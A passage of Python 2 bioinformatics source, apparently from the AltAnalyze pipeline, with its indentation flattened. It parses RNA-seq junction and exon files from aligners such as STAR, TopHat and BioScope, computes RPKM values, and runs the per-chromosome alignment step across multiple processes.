self.chr = chr; self.strand = strand; self._chr = chr
self.exon1_stop = exon1_stop; self.exon2_start = exon2_start
self.junction_id = junction_id; self.biotype = biotype
#self.reads = reads; self.condition = condition
self.left_exon = None; self.right_exon = None; self.jd = None; self.gene_id = None
self.trans_splicing = None
self.splice_events=''
self.splice_junctions=''
self.seq_length=''
self.uid = None
def Chr(self): return self.chr
def Strand(self): return self.strand
def Exon1Stop(self): return self.exon1_stop
def Exon2Start(self): return self.exon2_start
def setExon1Stop(self,exon1_stop): self.exon1_stop = exon1_stop
def setExon2Start(self,exon2_start): self.exon2_start = exon2_start
def setSeqLength(self,seq_length): self.seq_length = seq_length
def SeqLength(self): return self.seq_length
def BioType(self): return self.biotype
def checkExonPosition(self,exon_pos):
if exon_pos == self.Exon1Stop(): return 'left'
else: return 'right'
### These are used to report novel exon boundaries
def setExon1Start(self,exon1_start): self.exon1_start = exon1_start
def setExon2Stop(self,exon2_stop): self.exon2_stop = exon2_stop
def Exon1Start(self): return self.exon1_start
def Exon2Stop(self): return self.exon2_stop
def Reads(self): return self.reads
def JunctionID(self): return self.junction_id
def Condition(self): return self.condition
def setExonAnnotations(self,jd):
self.jd = jd
self.splice_events = jd.AssociatedSplicingEvent()
self.splice_junctions = jd.AssociatedSplicingJunctions()
self.exon_region = jd.ExonRegionIDs()
self.exonid = jd.ExonID()
self.gene_id = jd.GeneID()
self.uid = jd.GeneID()+':'+jd.ExonRegionIDs()
def ExonAnnotations(self): return self.jd
def setLeftExonAnnotations(self,ld): self.gene_id,self.left_exon = ld
def LeftExonAnnotations(self): return self.left_exon
def setRightExonAnnotations(self,rd): self.secondary_geneid,self.right_exon = rd
def RightExonAnnotations(self): return self.right_exon
def setGeneID(self,geneid): self.gene_id = geneid
def GeneID(self): return self.gene_id
def setSecondaryGeneID(self,secondary_geneid): self.secondary_geneid = secondary_geneid
def SecondaryGeneID(self): return self.secondary_geneid
def setTransSplicing(self): self.trans_splicing = 'yes'
def TransSplicing(self): return self.trans_splicing
def SpliceSitesFound(self):
if self.jd != None: sites_found = 'both'
elif self.left_exon != None and self.right_exon != None: sites_found = 'both'
elif self.left_exon != None: sites_found = 'left'
elif self.right_exon != None: sites_found = 'right'
else: sites_found = None
return sites_found
def setConstitutive(self,constitutive): self.constitutive = constitutive
def Constitutive(self): return self.constitutive
def setAssociatedSplicingEvent(self,splice_events): self.splice_events = splice_events
def AssociatedSplicingEvent(self): return self.splice_events
def setAssociatedSplicingJunctions(self,splice_junctions): self.splice_junctions = splice_junctions
def AssociatedSplicingJunctions(self): return self.splice_junctions
def setExonID(self,exonid): self.exonid = exonid
def ExonID(self): return self.exonid
def setExonRegionID(self,exon_region): self.exon_region = exon_region
def ExonRegionID(self): return self.exon_region
def setUniqueID(self,uid): self.uid = uid
def UniqueID(self): return self.uid
def setLeftExonRegionData(self,li): self.li = li
def LeftExonRegionData(self): return self.li
def setRightExonRegionData(self,ri): self.ri = ri
def RightExonRegionData(self): return self.ri
def setNovel(self, side): self.side = side
def Novel(self): return self.side
def __repr__(self): return "JunctionData values"
def checkBEDFileFormat(bed_dir,root_dir):
""" This method checks to see if the BED files (junction or exon) have 'chr' proceeding the chr number.
It also checks to see if some files have two underscores and one has none or if double underscores are missing from all."""
dir_list = read_directory(bed_dir)
x=0
break_now = False
chr_present = False
condition_db={}
for filename in dir_list:
fn=filepath(bed_dir+filename)
#if ('.bed' in fn or '.BED' in fn): delim = 'r'
delim = 'rU'
if '.tab' in string.lower(filename) or '.bed' in string.lower(filename) or '.junction_quantification.txt' in string.lower(filename):
condition_db[filename]=[]
for line in open(fn,delim).xreadlines(): ### changed rU to r to remove \r effectively, rather than read as end-lines
if line[0] == '#': x=0 ### BioScope
elif x == 0: x=1 ###skip the first line
elif x < 10: ### Only check the first 10 lines
if 'chr' in line: ### Need to look at multiple input formats (chr could be in t[0] or t[1])
chr_present = True
x+=1
else:
break_now = True
break
if break_now == True:
break
    ### Check to see if exon.bed and junction.bed file names are proper or faulty (faulty names will result in downstream errors)
double_underscores=[]
no_doubles=[]
for condition in condition_db:
if '__' in condition:
double_underscores.append(condition)
else:
no_doubles.append(condition)
exon_beds=[]
junctions_beds=[]
if len(double_underscores)>0 and len(no_doubles)>0:
### Hence, a problem is likely due to inconsistent naming
        print 'The input files appear to have inconsistent naming. If both exon and junction sample data are present, make sure they are named properly.'
print 'For example: cancer1__exon.bed, cancer1__junction.bed (double underscore required to match these samples up)!'
print 'Exiting AltAnalyze'; forceError
elif len(no_doubles)>0:
for condition in no_doubles:
condition = string.lower(condition)
if 'exon' in condition:
exon_beds.append(condition)
if 'junction' in condition:
junctions_beds.append(condition)
if len(exon_beds)>0 and len(junctions_beds)>0:
            print 'The input files appear to have inconsistent naming. If both exon and junction sample data are present, make sure they are named properly.'
print 'For example: cancer1__exon.bed, cancer1__junction.bed (double underscore required to match these samples up)!'
print 'Exiting AltAnalyze'; forceError
return chr_present
def getStrandMappingData(species):
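    ### Build a (chromosome, exon-boundary position) -> strand lookup from the Ensembl exon coordinate file; used to infer strand for junction formats that do not report it (e.g., STAR)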
splicesite_db={}
refExonCoordinateFile = unique.filepath('AltDatabase/ensembl/'+species+'/'+species+'_Ensembl_exon.txt')
firstLine=True
for line in open(refExonCoordinateFile,'rU').xreadlines():
if firstLine: firstLine=False
else:
line = line.rstrip('\n')
t = string.split(line,'\t'); #'gene', 'exon-id', 'chromosome', 'strand', 'exon-region-start(s)', 'exon-region-stop(s)', 'constitutive_call', 'ens_exon_ids', 'splice_events', 'splice_junctions'
geneID, exon, chr, strand, start, stop = t[:6]
splicesite_db[chr,int(start)]=strand
splicesite_db[chr,int(stop)]=strand
return splicesite_db
def importBEDFile(bed_dir,root_dir,species,normalize_feature_exp,getReads=False,searchChr=None,getBiotype=None,testImport=False,filteredJunctions=None):
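    ### Parse per-sample junction/exon files (TopHat, HMMSplicer, SpliceMap, STAR, BioScope and TCGA formats) for one chromosome; returns JunctionData objects on the first pass, or per-condition read-count dictionaries when getReads is True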
dir_list = read_directory(bed_dir)
begin_time = time.time()
if 'chr' not in searchChr:
searchChr = 'chr'+searchChr
condition_count_db={}; neg_count=0; pos_count=0; junction_db={}; biotypes={}; algorithms={}; exon_len_db={}; splicesite_db={}
if testImport == 'yes': print "Reading user RNA-seq input data files"
for filename in dir_list:
count_db={}; rows=0
fn=filepath(bed_dir+filename)
condition = export.findFilename(fn)
if '__' in condition:
### Allow multiple junction files per sample to be combined (e.g. canonical and non-canonical junction alignments)
condition=string.split(condition,'__')[0]+filename[-4:]
if ('.bed' in fn or '.BED' in fn or '.tab' in fn or '.TAB' in fn or '.junction_quantification.txt' in fn) and '._' not in condition:
if ('.bed' in fn or '.BED' in fn): delim = 'r'
else: delim = 'rU'
### The below code removes .txt if still in the filename along with .tab or .bed
if '.tab' in fn: condition = string.replace(condition,'.txt','.tab')
elif '.bed' in fn: condition = string.replace(condition,'.txt','.bed')
if '.TAB' in fn: condition = string.replace(condition,'.txt','.TAB')
elif '.BED' in fn: condition = string.replace(condition,'.txt','.BED')
if testImport == 'yes': print "Reading the bed file", [fn], condition
            ### If the BED was manually created on a Mac, will need 'rU' - test this
for line in open(fn,delim).xreadlines(): break
if len(line)>500: delim = 'rU'
for line in open(fn,delim).xreadlines(): ### changed rU to r to remove \r effectively, rather than read as end-lines
data = cleanUpLine(line)
t = string.split(data,'\t')
rows+=1
if rows==1 or '#' == data[0]:
format_description = data
algorithm = 'Unknown'
if 'TopHat' in format_description: algorithm = 'TopHat'
elif 'HMMSplicer' in format_description: algorithm = 'HMMSplicer'
elif 'SpliceMap junctions' in format_description: algorithm = 'SpliceMap'
elif t[0] == 'E1': algorithm = 'BioScope-junction'
elif '# filterOrphanedMates=' in data or 'alignmentFilteringMode=' in data or '#number_of_mapped_reads=' in data:
algorithm = 'BioScope-exon'
elif '.junction_quantification.txt' in fn:
algorithm = 'TCGA format'
if 'barcode' in t: junction_position = 1
else: junction_position = 0
elif '.tab' in fn and len(t)==9:
try: start = float(t[1]) ### expect this to be a numerical coordinate
except Exception: continue
algorithm = 'STAR'
strand = '-' ### If no strand exists
rows=2 ### allows this first row to be processed
if len(splicesite_db)==0: ### get strand to pos info
splicesite_db = getStrandMappingData(species)
if testImport == 'yes': print condition, algorithm
if rows>1:
try:
if ':' in t[0]:
chr = string.split(t[0],':')[0]
else: chr = t[0]
if 'chr' not in chr:
chr = 'chr'+chr
if searchChr == chr or ('BioScope' in algorithm and searchChr == t[1]): proceed = True
elif searchChr == 'chrMT' and ('BioScope' not in algorithm):
if 'M' in chr and len(chr)<6: proceed = True ### If you don't have the length, any random thing with an M will get included
else: proceed = False
else: proceed = False
except IndexError:
print 'The input file:\n',filename
                        print 'is not formatted as expected (format='+algorithm+').'
print 'search chromosome:',searchChr
print t; force_bad_exit
if proceed:
proceed = False
if '.tab' in fn or '.TAB' in fn:
### Applies to non-BED format Junction and Exon inputs (BioScope)
if 'BioScope' in algorithm:
if algorithm == 'BioScope-exon': ### Not BED format
chr,source,data_type,start,end,reads,strand,null,gene_info=t[:9]
if 'chr' not in chr: chr = 'chr'+chr
if data_type == 'exon': ### Can also be CDS
gene_info,test,rpkm_info,null = string.split(gene_info,';')
symbol = string.split(gene_info,' ')[-1]
#refseq = string.split(transcript_info,' ')[-1]
rpkm = string.split(rpkm_info,' ')[-1]
#if normalize_feature_exp == 'RPKM': reads = rpkm ### The RPKM should be adjusted +1 counts, so don't use this
biotype = 'exon'; biotypes[biotype]=[]
exon1_stop,exon2_start = int(start),int(end); junction_id=''
### Adjust exon positions - not ideal but necessary. Needed as a result of exon regions overlapping by 1nt (due to build process)
exon1_stop+=1; exon2_start-=1
#if float(reads)>4 or getReads:
proceed = True ### Added in version 2.0.9 to remove rare novel isoforms
seq_length = abs(exon1_stop-exon2_start)
if algorithm == 'BioScope-junction':
chr = t[1]; strand = t[2]; exon1_stop = int(t[4]); exon2_start = int(t[8]); count_paired = t[17]; count_single = t[19]; score=t[21]
if 'chr' not in chr: chr = 'chr'+chr
try: exon1_start = int(t[3]); exon2_stop = int(t[9])
except Exception: pass ### If missing, these are not assigned
reads = str(int(float(count_paired))+int(float(count_single))) ### Users will either have paired or single read (this uses either)
biotype = 'junction'; biotypes[biotype]=[]; junction_id=''
if float(reads)>4 or getReads: proceed = True ### Added in version 2.0.9 to remove rare novel isoforms
seq_length = abs(float(exon1_stop-exon2_start))
if 'STAR' in algorithm:
chr = t[0]; exon1_stop = int(t[1])-1; exon2_start = int(t[2])+1; strand=''
if 'chr' not in chr: chr = 'chr'+chr
reads = str(int(t[7])+int(t[6]))
biotype = 'junction'; biotypes[biotype]=[]; junction_id=''
if float(reads)>4 or getReads: proceed = True ### Added in version 2.0.9 to remove rare novel isoforms
if (chr,exon1_stop) in splicesite_db:
strand = splicesite_db[chr,exon1_stop]
elif (chr,exon2_start) in splicesite_db:
strand = splicesite_db[chr,exon2_start]
#else: proceed = False
seq_length = abs(float(exon1_stop-exon2_start))
if strand == '-': ### switch the orientation of the positions
exon1_stop,exon2_start=exon2_start,exon1_stop
exon1_start = exon1_stop; exon2_stop = exon2_start
#if 9996685==exon1_stop and 10002682==exon2_stop:
#print chr, strand, reads, exon1_stop, exon2_start,proceed;sys.exit()
else:
try:
if algorithm == 'TCGA format':
coordinates = string.split(t[junction_position],',')
try: chr,pos1,strand = string.split(coordinates[0],':')
except Exception: print t;sys.exit()
chr,pos2,strand = string.split(coordinates[1],':')
if 'chr' not in chr: chr = 'chr'+chr
pos2 = str(int(pos2)-1) ### This is the bed format conversion with exons of 0 length
exon1_start, exon2_stop = pos1, pos2
reads = t[junction_position+1]
junction_id = t[junction_position]
exon1_len=0; exon2_len=0
else:
### Applies to BED format Junction input
chr, exon1_start, exon2_stop, junction_id, reads, strand, null, null, null, null, lengths, null = t
if 'chr' not in chr: chr = 'chr'+chr
exon1_len,exon2_len=string.split(lengths,',')[:2]; exon1_len = int(exon1_len); exon2_len = int(exon2_len)
exon1_start = int(exon1_start); exon2_stop = int(exon2_stop)
biotype = 'junction'; biotypes[biotype]=[]
if strand == '-':
if (exon1_len+exon2_len)==0: ### Kallisto-Splice directly reports these coordinates
exon1_stop = exon1_start
exon2_start = exon2_stop
else:
exon1_stop = exon1_start+exon1_len; exon2_start=exon2_stop-exon2_len+1
### Exons have the opposite order
a = exon1_start,exon1_stop; b = exon2_start,exon2_stop
exon1_stop,exon1_start = b; exon2_stop,exon2_start = a
else:
if (exon1_len+exon2_len)==0: ### Kallisto-Splice directly reports these coordinates
exon1_stop = exon1_start
exon2_start= exon2_stop
else:
exon1_stop = exon1_start+exon1_len; exon2_start=exon2_stop-exon2_len+1
if float(reads)>4 or getReads: proceed = True
if algorithm == 'HMMSplicer':
if '|junc=' in junction_id: reads = string.split(junction_id,'|junc=')[-1]
else: proceed = False
if algorithm == 'SpliceMap':
if ')' in junction_id and len(junction_id)>1: reads = string.split(junction_id,')')[0][1:]
else: proceed = False
seq_length = abs(float(exon1_stop-exon2_start)) ### Junction distance
except Exception,e:
#print traceback.format_exc();sys.exit()
### Applies to BED format exon input (BEDTools export)
# bamToBed -i accepted_hits.bam -split| coverageBed -a stdin -b /home/nsalomonis/databases/Mm_Ensembl_exons.bed > day0_8B__exons.bed
try: chr, start, end, exon_id, null, strand, reads, bp_coverage, bp_total, percent_coverage = t
except Exception:
                                    print 'The file',fn,'does not appear to be properly formatted as input.'
print t; force_exception
if 'chr' not in chr: chr = 'chr'+chr
algorithm = 'TopHat-exon'; biotype = 'exon'; biotypes[biotype]=[]
exon1_stop,exon2_start = int(start),int(end); junction_id=exon_id; seq_length = float(bp_total)
if seq_length == 0:
seq_length = abs(float(exon1_stop-exon2_start))
### Adjust exon positions - not ideal but necessary. Needed as a result of exon regions overlapping by 1nt (due to build process)
exon1_stop+=1; exon2_start-=1
#if float(reads)>4 or getReads: ### Added in version 2.0.9 to remove rare novel isoforms
proceed = True
#else: proceed = False
if proceed:
if 'chr' not in chr:
chr = 'chr'+chr ### Add the chromosome prefix
if chr == 'chrM': chr = 'chrMT' ### MT is the Ensembl convention whereas M is the Affymetrix and UCSC convention
if chr == 'M': chr = 'MT' ### MT is the Ensembl convention whereas M is the Affymetrix and UCSC convention
if strand == '+': pos_count+=1
else: neg_count+=1
if getReads and seq_length>0:
if getBiotype == biotype:
if biotype == 'junction':
### We filtered for junctions>4 reads before, now we include all reads for expressed junctions
if (chr,exon1_stop,exon2_start) in filteredJunctions:
count_db[chr,exon1_stop,exon2_start] = reads
try: exon_len_db[chr,exon1_stop,exon2_start] = seq_length
except Exception: exon_len_db[chr,exon1_stop,exon2_start] = []
else:
count_db[chr,exon1_stop,exon2_start] = reads
try: exon_len_db[chr,exon1_stop,exon2_start] = seq_length
except Exception: exon_len_db[chr,exon1_stop,exon2_start] = []
elif seq_length>0:
if (chr,exon1_stop,exon2_start) not in junction_db:
ji = JunctionData(chr,strand,exon1_stop,exon2_start,junction_id,biotype)
junction_db[chr,exon1_stop,exon2_start] = ji
try: ji.setSeqLength(seq_length) ### If RPKM imported or calculated
except Exception: null=[]
try: ji.setExon1Start(exon1_start);ji.setExon2Stop(exon2_stop)
except Exception: null=[]
key = chr,exon1_stop,exon2_start
algorithms[algorithm]=[]
if getReads:
if condition in condition_count_db:
### combine the data from the different files for the same sample junction alignments
count_db1 = condition_count_db[condition]
for key in count_db:
if key not in count_db1: count_db1[key] = count_db[key]
else:
combined_counts = int(count_db1[key])+int(count_db[key])
count_db1[key] = str(combined_counts)
condition_count_db[condition]=count_db1
else:
try: condition_count_db[condition] = count_db
except Exception: null=[] ### Occurs for other text files in the directory that are not used for the analysis
end_time = time.time()
if testImport == 'yes': print 'Read coordinates imported in',int(end_time-begin_time),'seconds'
if getReads:
#print len(exon_len_db), getBiotype, 'read counts present for',algorithm
return condition_count_db,exon_len_db,biotypes,algorithms
else:
if testImport == 'yes':
if 'exon' not in biotypes and 'BioScope' not in algorithm:
print len(junction_db),'junctions present in',algorithm,'format BED files.' # ('+str(pos_count),str(neg_count)+' by strand).'
elif 'exon' in biotypes and 'BioScope' not in algorithm:
print len(junction_db),'sequence identifiers present in input files.'
else: print len(junction_db),'sequence identifiers present in BioScope input files.'
return junction_db,biotypes,algorithms
def importExonCoordinates(probeCoordinateFile,search_chr,getBiotype):
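    ### Import a probe-to-coordinate map (probe ID, probeset, chr, strand, start, end and optional biotype) and build JunctionData objects so array probes can be processed like RNA-seq features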
probe_coordinate_db={}
junction_db={}
biotypes={}
x=0
fn=filepath(probeCoordinateFile)
for line in open(fn,'rU').xreadlines(): ### changed rU to r to remove \r effectively, rather than read as end-lines
data = cleanUpLine(line)
if x==0: x=1
else:
t = string.split(data,'\t')
probe_id = t[0]; probeset_id=t[1]; chr=t[2]; strand=t[3]; start=t[4]; end=t[5]
exon1_stop,exon2_start = int(start),int(end)
seq_length = abs(float(exon1_stop-exon2_start))
if 'chr' not in chr:
chr = 'chr'+chr ### Add the chromosome prefix
if chr == 'chrM': chr = 'chrMT' ### MT is the Ensembl convention whereas M is the Affymetrix and UCSC convention
if search_chr == chr or search_chr == None:
try: biotype = t[6]
except Exception:
if seq_length>25:biotype = 'junction'
else: biotype = 'exon'
if strand == '-':
exon1_stop,exon2_start = exon2_start, exon1_stop ### this is their actual 5' -> 3' orientation
if biotype == 'junction':
exon1_start,exon2_stop = exon1_stop,exon2_start
else:
exon1_stop+=1; exon2_start-=1
biotypes[biotype]=[]
if getBiotype == biotype or getBiotype == None:
ji = JunctionData(chr,strand,exon1_stop,exon2_start,probe_id,biotype)
junction_db[chr,exon1_stop,exon2_start] = ji
try: ji.setSeqLength(seq_length) ### If RPKM imported or calculated
except Exception: null=[]
try: ji.setExon1Start(exon1_start);ji.setExon2Stop(exon2_stop)
except Exception: null=[]
probe_coordinate_db[probe_id] = chr,exon1_stop,exon2_start ### Import the expression data for the correct chromosomes with these IDs
return probe_coordinate_db, junction_db, biotypes
def importExpressionMatrix(exp_dir,root_dir,species,fl,getReads,search_chr=None,getBiotype=None):
""" Non-RNA-Seq expression data (typically Affymetrix microarray) import and mapping to an external probe-coordinate database """
begin_time = time.time()
condition_count_db={}; neg_count=0; pos_count=0; algorithms={}; exon_len_db={}
probe_coordinate_db, junction_db, biotypes = importExonCoordinates(fl.ExonMapFile(),search_chr,getBiotype)
x=0
fn=filepath(exp_dir)[:-1]
condition = export.findFilename(fn)
    ### If the BED was manually created on a Mac, will need 'rU' - test this
for line in open(fn,'rU').xreadlines(): ### changed rU to r to remove \r effectively, rather than read as end-lines
data = cleanUpLine(line)
t = string.split(data,'\t')
if '#' == data[0]: None
elif x==0:
if 'block' in t:
start_index = 7
else:
start_index = 1
headers = t[start_index:]
x=1
else:
proceed = 'yes' ### restrict by chromosome with minimum line parsing (unless we want counts instead)
probe_id=t[0]
if probe_id in probe_coordinate_db:
key = probe_coordinate_db[probe_id]
if getReads == 'no':
pass
else:
expression_data = t[start_index:]
i=0
for sample in headers:
if sample in condition_count_db:
count_db = condition_count_db[sample]
count_db[key] = expression_data[i]
exon_len_db[key]=[]
else:
count_db={}
count_db[key] = expression_data[i]
condition_count_db[sample] = count_db
exon_len_db[key]=[]
i+=1
algorithms['ProbeData']=[]
end_time = time.time()
if testImport == 'yes': print 'Probe data imported in',int(end_time-begin_time),'seconds'
if getReads == 'yes':
return condition_count_db,exon_len_db,biotypes,algorithms
else:
return junction_db,biotypes,algorithms
def adjustCounts(condition_count_db,exon_len_db):
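    ### Add a pseudocount of one to every feature count (missing features become 1) so that log2 fold changes can be computed when a condition has zero reads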
for key in exon_len_db:
try:
null=exon_len_db[key]
for condition in condition_count_db:
count_db = condition_count_db[condition]
                try: read_count = float(count_db[key])+1 ### A +1 pseudocount gives more realistic log2 folds when zero counts are compared
except KeyError: read_count = 1 ###Was zero, but needs to be one for more realistic log2 fold calculations
count_db[key] = str(read_count) ### Replace original counts with adjusted counts
except Exception: null=[]
return condition_count_db
def calculateRPKM(condition_count_db,exon_len_db,biotype_to_examine):
"""Determines the total number of reads in a sample and then calculates RPMK relative to a pre-determined junction length (60).
60 was choosen, based on Illumina single-end read lengths of 35 (5 nt allowed overhand on either side of the junction)"""
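    ### i.e., RPKM = 1e9 * (reads + 1) / (total mapped reads * feature length), with feature length fixed at 60 for junctions and the library-average total used when a feature has zero counts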
### Get the total number of mapped reads
mapped_reads={}
for condition in condition_count_db:
mapped_reads[condition]=0
count_db = condition_count_db[condition]
for key in count_db:
read_count = count_db[key]
mapped_reads[condition]+=float(read_count)
### Use the average_total_reads when no counts reported such that 0 counts are comparable
average_total_reads = 0
for i in mapped_reads:
average_total_reads+=mapped_reads[i]
if testImport == 'yes':
print 'condition:',i,'total reads:',mapped_reads[i]
average_total_reads = average_total_reads/len(condition_count_db)
if testImport == 'yes':
print 'average_total_reads:',average_total_reads
k=0
c=math.pow(10.0,9.0)
for key in exon_len_db:
try:
for condition in condition_count_db:
total_mapped_reads = mapped_reads[condition]
                try: read_count = float(condition_count_db[condition][key])+1 ### A +1 pseudocount gives more realistic log2 folds when zero counts are compared
except KeyError: read_count = 1 ###Was zero, but needs to be one for more realistic log2 fold calculations
if biotype_to_examine == 'junction': region_length = 60.0
else:
try: region_length = exon_len_db[key]
except Exception: continue ### This should only occur during testing (when restricting to one or few chromosomes)
                if read_count == 1: ### A +1 pseudocount gives more realistic log2 folds when zero counts are compared
rpkm = c*(float(read_count)/(float(average_total_reads)*region_length))
try:
if region_length == 0:
region_length = abs(int(key[2]-key[1]))
rpkm = c*(read_count/(float(total_mapped_reads)*region_length))
except Exception:
print condition, key
                    print 'Error Encountered... Exon or Junction of zero length encountered... RPKM failed... Exiting AltAnalyze.'
                    print 'This error may be due to inconsistent file naming. If both exon and junction sample data are present, make sure they are named properly.'
print 'For example: cancer1__exon.bed, cancer1__junction.bed (double underscore required to match these samples up)!'
print [read_count,total_mapped_reads,region_length];k=1; forceError
                condition_count_db[condition][key] = str(rpkm) ### Replace original counts with RPKM
except Exception:
if k == 1: kill
null=[]
return condition_count_db
def calculateGeneLevelStatistics(steady_state_export,species,expressed_gene_exon_db,normalize_feature_exp,array_names,fl,excludeLowExp=True,exportRPKMs=False):
global UserOptions; UserOptions = fl
exp_file = string.replace(steady_state_export,'-steady-state','')
if normalize_feature_exp == 'RPKM':
exp_dbase, all_exp_features, array_count = importRawCountData(exp_file,expressed_gene_exon_db,excludeLowExp=excludeLowExp)
steady_state_db = obtainGeneCounts(expressed_gene_exon_db,species,exp_dbase,array_count,normalize_feature_exp,excludeLowExp=excludeLowExp); exp_dbase=[]
exportGeneCounts(steady_state_export,array_names,steady_state_db)
steady_state_db = calculateGeneRPKM(steady_state_db)
if exportRPKMs:
exportGeneCounts(steady_state_export,array_names,steady_state_db,dataType='RPKMs')
else:
exp_dbase, all_exp_features, array_count = importNormalizedCountData(exp_file,expressed_gene_exon_db)
steady_state_db = obtainGeneCounts(expressed_gene_exon_db,species,exp_dbase,array_count,normalize_feature_exp); exp_dbase=[]
exportGeneCounts(steady_state_export,array_names,steady_state_db)
return steady_state_db, all_exp_features
def exportGeneCounts(steady_state_export,headers,gene_count_db,dataType='counts'):
### In addition to RPKM gene-level data, export gene level counts and lengths (should be able to calculate gene RPKMs from this file)
if dataType=='counts':
export_path = string.replace(steady_state_export,'exp.','counts.')
else:
export_path = steady_state_export
export_data = export.ExportFile(export_path)
title = string.join(['Ensembl']+headers,'\t')+'\n'
export_data.write(title)
for gene in gene_count_db:
sample_counts=[]
for count_data in gene_count_db[gene]:
try: read_count,region_length = count_data
except Exception: read_count = count_data
sample_counts.append(str(read_count))
sample_counts = string.join([gene]+sample_counts,'\t')+'\n'
export_data.write(sample_counts)
export_data.close()
def importGeneCounts(filename,import_type):
### Import non-normalized original counts and return the max value
counts_filename = string.replace(filename,'exp.','counts.')
status = verifyFile(counts_filename)
if status == 'not found': ### Occurs for non-normalized counts
counts_filename = filename
fn=filepath(counts_filename); x=0; count_db={}
for line in open(fn,'rU').xreadlines():
data = cleanUpLine(line)
t = string.split(data,'\t')
if x==0: array_names = t[1:]; x=1
else:
gene = t[0]
if import_type == 'max':
count_db[gene] = str(max(map(float,t[1:])))
else:
count_db[gene] = map(float,t[1:])
return count_db,array_names
def calculateGeneRPKM(gene_count_db):
"""Determines the total number of reads in a sample and then calculates RPMK relative to a pre-determined junction length (60).
60 was choosen, based on Illumina single-end read lengths of 35 (5 nt allowed overhand on either side of the junction)"""
### Get the total number of mapped reads (relative to all gene aligned rather than genome aligned exon reads)
mapped_reads={}
for gene in gene_count_db:
index=0
for (read_count,total_len) in gene_count_db[gene]:
try: mapped_reads[index]+=float(read_count)
except Exception: mapped_reads[index]=float(read_count)
index+=1
### Use the average_total_reads when no counts reported such that 0 counts are comparable
average_total_reads = 0
for i in mapped_reads: average_total_reads+=mapped_reads[i]
average_total_reads = average_total_reads/(index+1) ###
c=math.pow(10.0,9.0)
for gene in gene_count_db:
index=0; rpkms = []
for (read_count,region_length) in gene_count_db[gene]:
total_mapped_reads = mapped_reads[index]
#print [read_count],[region_length],[total_mapped_reads]
#if gene == 'ENSMUSG00000028186': print [read_count, index, total_mapped_reads,average_total_reads,region_length]
        if read_count == 0: read_count=1; rpkm = c*(float(read_count)/(float(average_total_reads)*region_length)) ### A +1 pseudocount gives more realistic log2 folds when zero counts are compared
else:
try: rpkm = c*(float(read_count+1)/(float(total_mapped_reads)*region_length)) ### read count is incremented +1 (see next line)
            except Exception: read_count=1; rpkm = c*(float(read_count)/(float(average_total_reads)*region_length)) ### A +1 pseudocount gives more realistic log2 folds when zero counts are compared
#if gene == 'ENSMUSG00000028186': print rpkm,read_count,index,total_mapped_reads,average_total_reads,region_length
#if gene == 'ENSMUSG00000026049': print gene_count_db[gene], mapped_reads[index], rpkm
rpkms.append(rpkm)
index+=1
        gene_count_db[gene] = rpkms ### Replace original counts with RPKM
return gene_count_db
def deleteOldAnnotations(species,root_dir,dataset_name):
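    ### Remove any prior experiment-specific AltDatabase, Counts directory and exp./counts./novel. result files so the analysis starts from a clean state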
db_dir = root_dir+'AltDatabase/'+species
try:
status = export.deleteFolder(db_dir)
if status == 'success':
print "...Previous experiment database deleted"
except Exception: null=[]
count_dir = root_dir+'ExpressionInput/Counts'
try: status = export.deleteFolder(count_dir)
except Exception: pass
if 'exp.' not in dataset_name: dataset_name = 'exp.'+dataset_name
if '.txt' not in dataset_name: dataset_name+='.txt'
export_path = root_dir+'ExpressionInput/'+dataset_name
try: os.remove(filepath(export_path))
except Exception: null=[]
try: os.remove(filepath(string.replace(export_path,'exp.','counts.')))
except Exception: null=[]
try: os.remove(filepath(string.replace(export_path,'exp.','novel.')))
except Exception: null=[]
from copy_reg import pickle
from types import MethodType
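### The helpers below implement the standard copy_reg recipe for pickling bound instance methods, which Python 2 multiprocessing requires when class instances/methods are dispatched to worker processes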
def _pickle_method(method):
func_name = method.im_func.__name__
obj = method.im_self
cls = method.im_class
return _unpickle_method, (func_name, obj, cls)
def _unpickle_method(func_name, obj, cls):
for cls in cls.mro():
try:
func = cls.__dict__[func_name]
except KeyError:
pass
else:
break
return func.__get__(obj, cls)
def call_it(instance, name, args=(), kwargs=None):
"indirect caller for instance methods and multiprocessing"
if kwargs is None:
kwargs = {}
return getattr(instance, name)(*args, **kwargs)
def alignExonsAndJunctionsToEnsembl(species,exp_file_location_db,dataset_name,Multi=None):
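    ### Top-level driver: align reads to Ensembl exons/junctions one chromosome at a time (multiprocessed when possible), concatenate the per-chromosome outputs and optionally RPKM-normalize the counts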
fl = exp_file_location_db[dataset_name]
try: multiThreading = fl.multiThreading()
except Exception: multiThreading = True
print 'multiThreading:',multiThreading
normalize_feature_exp = fl.FeatureNormalization()
testImport='no'
if 'demo_data' in fl.ExpFile():
### If the input files are in the AltAnalyze test directory, only analyze select chromosomes
print 'Running AltAnalyze in TEST MODE... restricting to select chromosomes only!!!!!'
testImport='yes'
rnaseq_begin_time = time.time()
p = AlignExonsAndJunctionsToEnsembl(species,exp_file_location_db,dataset_name,testImport)
chromosomes = p.getChromosomes()
### The following files need to be produced from chromosome specific sets later
countsFile = p.countsFile()
exonFile = p.exonFile()
junctionFile = p.junctionFile()
junctionCompFile = p.junctionCompFile()
novelJunctionAnnotations = p.novelJunctionAnnotations()
#chromosomes = ['chrMT']
#p('chrY'); p('chr1'); p('chr2')
#chromosomes = ['chr8','chr17']
multiprocessing_pipe = True
if 'exp.' not in dataset_name:
dataset_name = 'exp.'+dataset_name
if '.txt' not in dataset_name:
dataset_name+='.txt'
try:
mlp=Multi
pool_size = mlp.cpu_count()
print 'Using %d processes' % pool_size
if multiprocessing_pipe and multiThreading:
### This is like pool, but less efficient (needed to get print outs)
s = pool_size; b=0
chr_blocks=[]
while s<len(chromosomes):
chr_blocks.append(chromosomes[b:s])
b+=pool_size; s+=pool_size
chr_blocks.append(chromosomes[b:s])
queue = mlp.Queue()
results=[]
#parent_conn, child_conn=multiprocessing.Pipe()
for chromosomes in chr_blocks:
procs=list()
#print 'Block size:',len(chromosomes)
for search_chr in chromosomes:
proc = mlp.Process(target=p, args=(queue,search_chr)) ### passing sys.stdout unfortunately doesn't work to pass the Tk string
procs.append(proc)
proc.start()
for _ in procs:
val = queue.get()
if p.AnalysisMode() == 'GUI': print '*',
results.append(val)
for proc in procs:
proc.join()
elif multiThreading:
pool = mlp.Pool(processes=pool_size)
chr_vars=[]
for search_chr in chromosomes:
chr_vars.append(([],search_chr)) ### As an alternative for the pipe version above, pass an empty list rather than queue
results = pool.map(p, chr_vars) ### worker jobs initiated in tandem
try:pool.close(); pool.join(); pool = None
except Exception: pass
else:
forceThreadingError
print 'Read exon and junction mapping complete'
except Exception,e:
#print e
print 'Proceeding with single-processor version align...'
try: proc.close; proc.join; proc = None
